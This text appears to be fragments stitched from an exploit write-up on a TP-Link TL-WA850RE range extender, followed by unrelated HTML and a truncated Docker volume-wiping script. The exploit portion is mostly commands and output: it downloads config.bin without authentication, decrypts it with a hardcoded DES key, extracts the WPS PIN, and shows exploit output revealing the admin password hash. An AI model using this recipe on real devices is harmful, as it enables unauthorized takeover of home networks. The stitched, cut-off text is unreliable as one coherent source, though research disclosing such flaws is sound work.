POST /data/wps.setup.json HTTP/1.1
Origin: http://192.168.0.254
Content-Length: 100
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0
Host: 192.168.0.254
X-Requested-With: XMLHttpRequest

sub_40B990 => /fs/pages/userrpm/timeSettings_dst.html
sub_40E0C8 => /fs/pages/userrpm/connect.html
sub_40E144 => /fs/pages/userrpm/extend-settings.html
sub_40E04C => /fs/pages/userrpm/accessControl_adv.html
sub_40DF54 => /fs/pages/userrpm/region.html
sub_40DFD0 => /fs/pages/userrpm/wirelessSettings.html
sub_416DC0 => /fs/pages/userrpm/wifiCoverage.html
sub_418040 => /fs/pages/userrpm/dhcp.html
sub_419C90 => /fs/pages/userrpm/led.html
sub_41B484 => /fs/pages/frame/quick-setup.html

$ wget http://192.168.0.254/fs/data/config.bin
--2018-07-15 14:22:50--  http://192.168.0.254/fs/data/config.bin
Connecting to 192.168.0.254:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [x-bin/octet-stream]
Saving to: ‘config.bin’
2018-07-15 14:22:50 (127 MB/s) - ‘config.bin’ saved [1120]

$ openssl enc -d -des-ecb -nopad -K 478DA50BF9E3D2CF -in config.bin > decrypted.bin

$ binwalk -e decrypted.bin
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
144           0x90            Zlib compressed data, default compression
$ file _decrypted.bin.extracted/90
_decrypted.bin.extracted/90: ASCII text, with very long lines, with no line terminators

{
  "WPS" : {
    "pinCode" : "46209573admin",
    "pinEnabled" : 1,
    "enabled" : 1,
    "staWpsAvailable" : 3,
    "apWpsAvailable" : 3
  },
  "POWER" : {
    "start" : 75600,

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache, must-revalidate">
<meta http-equiv="expires" content="0">

#!/usr/bin/env python
import os
import md5
import zlib
import json
import socket
import urllib2
import subprocess

$ python ./exploit.py 192.168.0.254
[+] Requesting browser cookie…
[+] Retrieved cookie: ‘COOKIE=6500a8c000184c02; PATH=/; MAXAGE=9999; VERSION=1’
[+] Attempting to retrieve device configuration data…
[+] Got encrypted config file for model: TL-WA850RE v5.0
[+] Decrypting config file…
[+] Decompressing configuration data…
[+] Admin username: ‘admin’
[+] Admin password (MD5): ‘1048552CDE8EBBBE4CAEF9D3B95AB41B’
[+] Attempting login with password only…

#!/bin/bash
SERVICE=$1
read -r -p "This will completely wipe the ${SERVICE} database and restart the service. Are you sure? [y/N] " response
if [[ "$response" =~ ^([yY][eE][sS]|[yY])+$ ]]
then
    docker-compose stop ${SERVICE}
    docker-compose rm ${SERVICE}
    VOLUME=`docker volume ls | grep ${SERVICE} | tr -s ' ' | cut -d' ' -f2`
    docker volume rm -f ${VOLUME}